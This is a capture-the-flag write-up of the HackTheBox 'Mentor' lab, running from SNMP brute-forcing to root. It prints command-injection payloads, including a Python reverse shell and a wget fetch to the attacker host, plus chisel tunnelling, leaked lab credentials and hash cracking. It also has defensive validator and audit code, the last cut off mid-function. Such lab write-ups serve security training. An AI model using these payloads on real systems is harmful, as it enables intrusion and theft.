# HTB — Mentor

Misc, Medium, Linux

SNMP v3 credential brute-force yields API secret. Command injection in backup API endpoint. PostgreSQL password enables lateral movement and sudo root.

January 15, 2025, HackTheBox

#SNMP #Command Injection #API #PostgreSQL
## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.193
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 22:53 EST
Nmap scan report for 10.10.11.193
Host is up (0.018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c7:3b:fc:3c:f9:ce:ee:8b:48:18:d5:d1:af:8e:c2:bb (ECDSA)
|_  256 44:40:08:4c:0e:cb:d4:f1:8e:7e:ed:a8:5c:68:a4:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://mentorquotes.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/15%OT=22%CT=1%CU=34847%PV=Y%DS=2%DC=T%G=Y%TM=6788
OS:82F7%P=x86_64-pc-linux-gnu)SEQ(SP=F5%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=F6%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST1
OS:1NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE
OS:88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5
OS:3CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%R
OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   17.93 ms 10.10.14.1
2   19.70 ms 10.10.11.193

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.32 seconds
```
## nmap udp

```sh
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 23:41 EST
Nmap scan report for mentorquotes.htb (10.10.11.193)
Host is up (0.017s latency).

PORT    STATE  SERVICE VERSION
22/udp  closed ssh
110/udp closed pop3
143/udp closed imap
161/udp open   snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: a124f60a99b99c6200000000
|   snmpEngineBoots: 67
|_  snmpEngineTime: 48m04s
| snmp-sysdescr: Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
|_  System uptime: 48m4.06s (288406 timeticks)
993/udp closed imaps
995/udp closed pop3s
Service Info: Host: mentor

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.57 seconds
```

## 80
```sh
feroxbuster --url http://mentorquotes.htb/
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://mentorquotes.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        4l       34w      232c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      167l      621w     5506c http://mentorquotes.htb/
403      GET        9l       28w      281c http://mentorquotes.htb/server-status
[####################] - 2m     30000/30000  0s      found:2       errors:49
[####################] - 2m     30000/30000  321/s   http://mentorquotes.htb/
```
```sh
dirsearch -u http://mentorquotes.htb/server-status
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/sake/htb-labs/Mentor/reports/http_mentorquotes.htb/_server-status_25-01-15_23-39-25.txt

Target: http://mentorquotes.htb/

[23:39:25] Starting: server-status/
[23:39:26] 404 -  232B  - /server-status/%2e%2e//google.com
CTRL+C detected: Pausing threads, please wait...
[q]uit / [c]ontinue:
```

## snmp
```sh
snmpwalk -v2c -c public 10.10.11.193
SNMPv2-MIB::sysDescr.0 = STRING: Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (297730) 0:49:37.30
SNMPv2-MIB::sysContact.0 = STRING: Me <admin@mentorquotes.htb>
SNMPv2-MIB::sysName.0 = STRING: mentor
SNMPv2-MIB::sysLocation.0 = STRING: Sitting on the Dock of the Bay
SNMPv2-MIB::sysServices.0 = INTEGER: 72
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
SNMPv2-MIB::sysORID.7 = OID: UDP-MIB::udpMIB
SNMPv2-MIB::sysORID.8 = OID: IP-MIB::ip
SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing UDP implementations
SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing IP and ICMP implementations
SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
SNMPv2-MIB::sysORUpTime.1 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.2 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.3 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.4 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.5 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.6 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.7 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.8 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.9 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.10 = Timeticks: (2) 0:00:00.02
HOST-RESOURCES-MIB::hrSystemUptime.0 = Timeticks: (299564) 0:49:55.64
HOST-RESOURCES-MIB::hrSystemDate.0 = STRING: 2025-1-16,4:44:28.0,+0:0
HOST-RESOURCES-MIB::hrSystemInitialLoadDevice.0 = INTEGER: 393216
HOST-RESOURCES-MIB::hrSystemInitialLoadParameters.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-56-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
HOST-RESOURCES-MIB::hrSystemNumUsers.0 = Gauge32: 0
HOST-RESOURCES-MIB::hrSystemProcesses.0 = Gauge32: 228
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = INTEGER: 0
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
```
```sh
snmpwalk -c public -v2c 10.10.11.193 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
NET-SNMP-EXTEND-MIB::nsExtendOutputFull = No more variables left in this MIB View (It is past the end of the MIB tree)
```

## vhost fuzzing
```sh
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://mentorquotes.htb/ -H 'Host: FUZZ.mentorquotes.htb' -fw 18 -mc all

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://mentorquotes.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.mentorquotes.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response words: 18
________________________________________________

api                     [Status: 404, Size: 22, Words: 2, Lines: 1, Duration: 24ms]
```
## api.mentorquotes.htb
```sh
feroxbuster --url http://api.mentorquotes.htb/
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://api.mentorquotes.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        1l        2w       22c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
307      GET        0l        0w        0c http://api.mentorquotes.htb/admin => http://api.mentorquotes.htb/admin/
200      GET       69l      212w     2637c http://api.mentorquotes.htb/docs/oauth2-redirect
200      GET        1l       48w     7676c http://api.mentorquotes.htb/openapi.json
307      GET        0l        0w        0c http://api.mentorquotes.htb/docs/ => http://api.mentorquotes.htb/docs
200      GET       31l       62w      969c http://api.mentorquotes.htb/docs
307      GET        0l        0w        0c http://api.mentorquotes.htb/users => http://api.mentorquotes.htb/users/
307      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
405      GET        1l        3w       31c http://api.mentorquotes.htb/users/add
422      GET        1l        3w      186c http://api.mentorquotes.htb/admin/check
[####################] - 84s    90005/90005  0s      found:8       errors:16262
[####################] - 83s    30000/30000  362/s   http://api.mentorquotes.htb/
[####################] - 83s    30000/30000  359/s   http://api.mentorquotes.htb/admin/
[####################] - 83s    30000/30000  364/s   http://api.mentorquotes.htb/users/ => Wildcard dir! stopped recursion
```

## snmpbrute
- https://github.com/SECFORCE/SNMP-Brute
- the other tool (onesixtyone) was not picking up the `internal` string
```sh
python3 snmpbrute.py -t 10.10.11.193
   _____ _   ____  _______     ____             __
  / ___// | / /  |/  / __ \   / __ )_______  __/ /____
  \__ \/  |/ / /|_/ / /_/ /  / __  / ___/ / / / __/ _ \
 ___/ / /|  / /  / / ____/  / /_/ / /  / /_/ / /_/  __/
/____/_/ |_/_/  /_/_/      /_____/_/   \__,_/\__/\___/

SNMP Bruteforce & Enumeration Script v2.0
http://www.secforce.com / nikos.vassakis <at> secforce.com
###############################################################

Trying ['', '0', '0392a0', '1234', '2read', '3com', '3Com', '3COM', '4changes', 'access', 'adm', 'admin', 'Admin', 'administrator', 'agent', 'agent_steal', 'all', 'all private', 'all public', 'anycom', 'ANYCOM', 'apc', 'bintec', 'blue', 'boss', 'c', 'C0de', 'cable-d', 'cable_docsispublic@es0', 'cacti', 'canon_admin', 'cascade', 'cc', 'changeme', 'cisco', 'CISCO', 'cmaker', 'comcomcom', 'community', 'core', 'CR52401', 'crest', 'debug', 'default', 'demo', 'dilbert', 'enable', 'entry', 'field', 'field-service', 'freekevin', 'friend', 'fubar', 'guest', 'hello', 'hideit', 'host', 'hp_admin', 'ibm', 'IBM', 'ilmi', 'ILMI', 'intel', 'Intel', 'intermec', 'Intermec', 'internal', 'internet', 'ios', 'isdn', 'l2', 'l3', 'lan', 'liteon', 'login', 'logon', 'lucenttech', 'lucenttech1', 'lucenttech2', 'manager', 'master', 'microsoft', 'mngr', 'mngt', 'monitor', 'mrtg', 'nagios', 'net', 'netman', 'network', 'nobody', 'NoGaH$@!', 'none', 'notsopublic', 'nt', 'ntopia', 'openview', 'operator', 'OrigEquipMfr', 'ourCommStr', 'pass', 'passcode', 'password', 'PASSWORD', 'pr1v4t3', 'pr1vat3', 'private', ' private', 'private ', 'Private', 'PRIVATE', 'private@es0', 'Private@es0', 'private@es1', 'Private@es1', 'proxy', 'publ1c', 'public', ' public', 'public ', 'Public', 'PUBLIC', 'public@es0', 'public@es1', 'public/RO', 'read', 'read-only', 'readwrite', 'read-write', 'red', 'regional', '<removed>', 'rmon', 'rmon_admin', 'ro', 'root', 'router', 'rw', 'rwa', 'sanfran', 'san-fran', 'scotty', 'secret', 'Secret', 'SECRET', 'Secret C0de', 'security', 'Security', 'SECURITY', 'seri', 'server', 'snmp', 'SNMP', 'snmpd', 'snmptrap', 'snmp-Trap', 'SNMP_trap', 'SNMPv1/v2c', 'SNMPv2c', 'solaris', 'solarwinds', 'sun', 'SUN', 'superuser', 'supervisor', 'support', 'switch', 'Switch', 'SWITCH', 'sysadm', 'sysop', 'Sysop', 'system', 'System', 'SYSTEM', 'tech', 'telnet', 'TENmanUFactOryPOWER', 'test', 'TEST', 'test2', 'tiv0li', 'tivoli', 'topsecret', 'traffic', 'trap', 'user', 'vterm1', 'watch', 'watchit', 'windows', 'windowsnt', 'workstation', 'world', 'write', 'writeit', 'xyzzy', 'yellow', 'ILMI'] community strings ...
10.10.11.193 : 161 	Version (v2c):	internal
10.10.11.193 : 161 	Version (v1):	public
10.10.11.193 : 161 	Version (v2c):	public
10.10.11.193 : 161 	Version (v1):	public
10.10.11.193 : 161 	Version (v2c):	public
Waiting for late packets (CTRL+C to stop)

Trying identified strings for READ-WRITE ...

Identified Community strings
	0) 10.10.11.193 	internal (v2c)(RO)
	1) 10.10.11.193 	public (v1)(RO)
	2) 10.10.11.193 	public (v2c)(RO)
	3) 10.10.11.193 	public (v1)(RO)
	4) 10.10.11.193 	public (v2c)(RO)
```
Walking with the `internal` community exposes process command lines, including a secret passed to `login.py`:

```sh
HOST-RESOURCES-MIB::hrSWRunParameters.2135 = STRING: "/usr/local/bin/login.py kj23sadkj123as0-d213"
```

- username: james@mentorquotes
- credential worked with `james@mentorquotes.htb:kj23sadkj123as0-d213`
```sh
curl -X GET http://api.mentorquotes.htb/users/ \
  -H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0" \
  -H "Accept: application/json" | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   250  100   250    0     0   5417      0 --:--:-- --:--:-- --:--:--  5555
[
  {
    "id": 1,
    "email": "james@mentorquotes.htb",
    "username": "james"
  },
  {
    "id": 2,
    "email": "svc@mentorquotes.htb",
    "username": "service_acc"
  },
  {
    "id": 4,
    "email": "test@mentorquotes.htb",
    "username": "tester"
  },
  {
    "id": 5,
    "email": "test@mentorquotes.com",
    "username": "testing"
  }
]
```
## dir search api.mentorquotes.htb
```sh
feroxbuster --url http://api.mentorquotes.htb/
404      GET        1l        2w       22c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
307      GET        0l        0w        0c http://api.mentorquotes.htb/admin => http://api.mentorquotes.htb/admin/
200      GET       69l      212w     2637c http://api.mentorquotes.htb/docs/oauth2-redirect
307      GET        0l        0w        0c http://api.mentorquotes.htb/docs/ => http://api.mentorquotes.htb/docs
307      GET        0l        0w        0c http://api.mentorquotes.htb/users => http://api.mentorquotes.htb/users/
200      GET        1l       48w     7676c http://api.mentorquotes.htb/openapi.json
200      GET       31l       62w      969c http://api.mentorquotes.htb/docs
307      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
405      GET        1l        3w       31c http://api.mentorquotes.htb/admin/backup
403      GET        9l       28w      285c http://api.mentorquotes.htb/server-status
[####################] - 84s    90005/90005  0s      found:8       errors:8842
[####################] - 83s    30000/30000  361/s   http://api.mentorquotes.htb/
[####################] - 83s    30000/30000  360/s   http://api.mentorquotes.htb/admin/
[####################] - 83s    30000/30000  360/s   http://api.mentorquotes.htb/users/ => Wildcard dir! stopped recursion
```

## /admin/
The `path` field of the POST body to `/admin/backup` is passed to a shell; a time delay confirms it:

```json
{
  "path": "/etc/passwd; sleep 1;"
}
```

```json
{
  "path": "/etc/passwd; ping 10.10.14.6;"
}
```
```sh
tcpdump -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:33:53.337382 IP 10.10.14.6.38564 > mentorquotes.htb.http: Flags [S], seq 863935829, win 64240, options [mss 1460,sackOK,TS val 3980515860 ecr 0,nop,wscale 7], length 0
11:33:53.353896 IP mentorquotes.htb.http > 10.10.14.6.38564: Flags [S.], seq 3761899283, ack 863935830, win 65160, options [mss 1340,sackOK,TS val 2566650271 ecr 3980515860,nop,wscale 7], length 0
11:33:53.353947 IP 10.10.14.6.38564 > mentorquotes.htb.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 3980515876 ecr 2566650271], length 0
11:33:53.354129 IP 10.10.14.6.38564 > mentorquotes.htb.http: Flags [P.], seq 1:403, ack 1, win 502, options [nop,nop,TS val 3980515876 ecr 2566650271], length 402: HTTP: POST /admin/backup HTTP/1.1
11:33:53.371971 IP mentorquotes.htb.http > 10.10.14.6.38564: Flags [.], ack 403, win 506, options [nop,nop,TS val 2566650288 ecr 3980515876], length 0
11:33:53.381066 IP mentorquotes.htb > 10.10.14.6: ICMP echo request, id 20992, seq 0, length 64
11:33:53.381087 IP 10.10.14.6 > mentorquotes.htb: ICMP echo reply, id 20992, seq 0, length 64
11:33:54.382626 IP mentorquotes.htb > 10.10.14.6: ICMP echo request, id 20992, seq 1, length 64
11:33:54.382641 IP 10.10.14.6 > mentorquotes.htb: ICMP echo reply, id 20992, seq 1, length 64
11:33:55.382350 IP mentorquotes.htb > 10.10.14.6: ICMP echo request, id 20992, seq 2, length 64
```
```json
{
  "path": "/etc/passwd; wget http://10.10.14.6/rev.sh ;"
}
```

```json
{
  "path": "/etc/passwd; chmod +x rev.sh ;"
}
```

- need to escape the double quotes by adding a backslash

```json
{
  "path": "/etc/passwd; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.6\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")' ;"
}
```
```sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.193] 38766
/app # whoami
root
```
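The root cause above is a backup endpoint that splices the JSON `path` value into a shell command. As an added example (not the box's code; the `tar` argv and the `/app` allow-list root are assumptions), here is that unsafe pattern beside a hardened handler that validates the path and invokes the archiver without a shell, plus the same validator run over constructed request bodies the way a log review would:

```python
import json
import subprocess
from pathlib import Path

# Constructed example, not the box's real code: the backup endpoint is assumed
# to archive the requested path with tar, and only paths under /app are valid.
BACKUP_ROOT = Path("/app")              # assumed allow-list root
ARCHIVE = "/tmp/backup.tar.gz"          # assumed output file
SHELL_META = set(";|&$`\n<>()")


def unsafe_backup_command(path: str) -> str:
    """Vulnerable pattern: the JSON value is spliced into a shell string.
    '/etc/passwd; sleep 1;' turns into two commands when run with shell=True."""
    return f"tar -czf {ARCHIVE} {path}"


def validate_backup_path(path: str) -> Path:
    """Return the resolved path, or raise ValueError.

    Two independent checks: reject shell metacharacters (so even a future
    shell=True call cannot be abused), and reject anything that resolves
    outside BACKUP_ROOT (so '..' traversal and absolute system paths fail)."""
    bad = sorted(SHELL_META.intersection(path))
    if bad:
        raise ValueError(f"shell metacharacter in path: {bad}")
    resolved = Path(path).resolve()
    if resolved != BACKUP_ROOT and BACKUP_ROOT not in resolved.parents:
        raise ValueError(f"path outside backup root: {resolved}")
    return resolved


def safe_backup_argv(path: str) -> list:
    """Hardened form: an argv list for subprocess.run with shell=False, so
    the path is always a single argument and never parsed by a shell."""
    return ["tar", "-czf", ARCHIVE, str(validate_backup_path(path))]


def run_backup(path: str) -> subprocess.CompletedProcess:
    """Perform the backup without a shell (fails for paths that do not exist)."""
    return subprocess.run(safe_backup_argv(path), shell=False, check=True,
                          capture_output=True)


# Constructed request bodies, modelled on the payloads tested above plus a
# benign request and a traversal attempt.
SAMPLE_BODIES = [
    '{"path": "/app/data"}',
    '{"path": "/etc/passwd; sleep 1;"}',
    '{"path": "/etc/passwd; ping 10.10.14.6;"}',
    '{"path": "/app/../etc/passwd"}',
]


def flag_backup_requests(bodies):
    """Detection view: run the same validator over logged request bodies and
    return (path, reason) for every one that would have been rejected."""
    flagged = []
    for body in bodies:
        path = json.loads(body).get("path", "")
        try:
            validate_backup_path(path)
        except ValueError as exc:
            flagged.append((path, str(exc)))
    return flagged


if __name__ == "__main__":
    for item in flag_backup_requests(SAMPLE_BODIES):
        print("rejected:", item)
```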
## user.txt
```sh
cd /home
/home # ls
svc
/home # cd svc
/home/svc # ls
user.txt
/home/svc # cat user.txt
9c2501ee...
```
```sh
/app/app # cat db.py
import os
from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy.sql import func
from databases import Database
# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")
```
```sh
cd /opt
wget http://10.10.14.6/chisel
```
On the attacker machine:

```sh
./chisel server --reverse --port 1234
```

- the client is run on the target: the shell is inside a docker container, and the database host is reachable at the docker gateway 172.22.0.1, so that address is used as the destination of the reverse port forward

```sh
./chisel client 10.10.14.6:1234 R:5432:172.22.0.1:5432
```
```sh
psql -h localhost -U postgres --password 'postgres' -d mentorquotes_db
psql: warning: extra command-line argument "postgres" ignored
Password: postgres
```
```sh
mentorquotes_db-# \list
                                                           List of databases
      Name       |  Owner   | Encoding | Locale Provider |  Collate   |   Ctype    | ICU Locale | ICU Rules |   Access privileges
-----------------+----------+----------+-----------------+------------+------------+------------+-----------+-----------------------
 mentorquotes_db | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           |
 postgres        | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           |
 template0       | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
                 |          |          |                 |            |            |            |           | postgres=CTc/postgres
 template1       | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
                 |          |          |                 |            |            |            |           | postgres=CTc/postgres
(4 rows)
```
```sh
mentorquotes_db=# \c mentorquotes_db
Password: postgres
psql (16.3 (Debian 16.3-1+b1), server 13.7 (Debian 13.7-1.pgdg110+1))
You are now connected to database "mentorquotes_db" as user "postgres".
mentorquotes_db=# \d
              List of relations
 Schema |     Name      |   Type   |  Owner
--------+---------------+----------+----------
 public | cmd_exec      | table    | postgres
 public | quotes        | table    | postgres
 public | quotes_id_seq | sequence | postgres
 public | users         | table    | postgres
 public | users_id_seq  | sequence | postgres
(5 rows)
```
```sh
mentorquotes_db=# select * from users;
 id |         email          |  username   |             password
----+------------------------+-------------+----------------------------------
  1 | james@mentorquotes.htb | james       | 7ccdcd8c...
  2 | svc@mentorquotes.htb   | service_acc | 53f22d0d...
(2 rows)
```

## hashcat
```sh
hashcat -m 0 '53f22d0d...' /usr/share/wordlists/rockyou.txt
53f22d0d...:123meunomeeivani
```
## ssh as svc
```sh
ssh svc@10.10.11.193
123meunomeeivani
```
linpeas output, active ports:

```sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 172.22.0.1:81           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:46489         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 172.22.0.1:5432         0.0.0.0:*               LISTEN      -
tcp        0      0 172.22.0.1:8000         0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
```
```sh
svc@mentor:/etc$ grep -rn ./ -ie "pass"
grep: ./sudoers.d/README: Permission denied
./snmp/snmpd.conf:78:# createUser username (MD5|SHA|SHA-512|SHA-384|SHA-256|SHA-224) authpassphrase [DES|AES] [privpassphrase]
./snmp/snmpd.conf:92:createUser bootstrap MD5 SuperSecurePassword123__ DES
```
## searching for james password
```sh
svc@mentor:/etc/snmp$ cat snmpd.conf
...
...
createUser bootstrap MD5 SuperSecurePassword123__ DES
rouser bootstrap priv
com2sec AllUser default internal
group AllGroup v2c AllUser
#view SystemView included .1.3.6.1.2.1.1
view SystemView included .1.3.6.1.2.1.25.1.1
view AllView included .1
acess AllGroup "" any noauth exact AllView none none
```
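This file carries both weaknesses the box turns on: a `createUser` line with a plaintext passphrase that any local user able to read the file can reuse, and the `internal` community mapped through `AllGroup` to `AllView` (`.1`), which is why `hrSWRunParameters` and the `login.py` argument were readable over SNMP. As an added example (not part of the writeup), a small audit script over a constructed copy of these directives reports both; the sample spells the last directive `access` as net-snmp expects, and the audit flags unknown directives so a typo like the one above would surface too:

```python
import shlex

# Constructed sample modelled on the snmpd.conf lines shown in the writeup
# (not the file as read from the box).
SAMPLE_SNMPD_CONF = """\
createUser bootstrap MD5 SuperSecurePassword123__ DES
rouser bootstrap priv
com2sec AllUser default internal
group AllGroup v2c AllUser
#view SystemView included .1.3.6.1.2.1.1
view SystemView included .1.3.6.1.2.1.25.1.1
view AllView included .1
access AllGroup "" any noauth exact AllView none none
"""

# hrSWRun: the process table, whose hrSWRunParameters leaks command lines.
HR_SW_RUN = ".1.3.6.1.2.1.25.4"
IGNORED = {"rouser", "rwuser", "syslocation", "syscontact", "agentaddress"}


def oid_covers(prefix: str, oid: str) -> bool:
    """True when `prefix` equals or is an ancestor of `oid` (dotted form)."""
    p = prefix.strip(".").split(".")
    return oid.strip(".").split(".")[: len(p)] == p


def audit_snmpd_conf(text: str) -> list:
    """Return findings: USM users created with a plaintext passphrase, v1/v2c
    communities whose read view covers the process table, and unknown
    directives (net-snmp skips those, which hides typos)."""
    com2sec, groups, views, access, findings = {}, {}, {}, [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tok = shlex.split(line)
        kw = tok[0].lower()
        if kw == "createuser" and len(tok) >= 4:
            priv = tok[4] if len(tok) > 4 else "noPriv"
            findings.append(f"createUser {tok[1]}: plaintext passphrase in "
                            f"config ({tok[2]}/{priv}); readable by any local "
                            f"user who can read the file")
        elif kw == "com2sec":                 # secname <- community
            com2sec[tok[1]] = tok[3]
        elif kw == "group":                   # secname -> [(group, model)]
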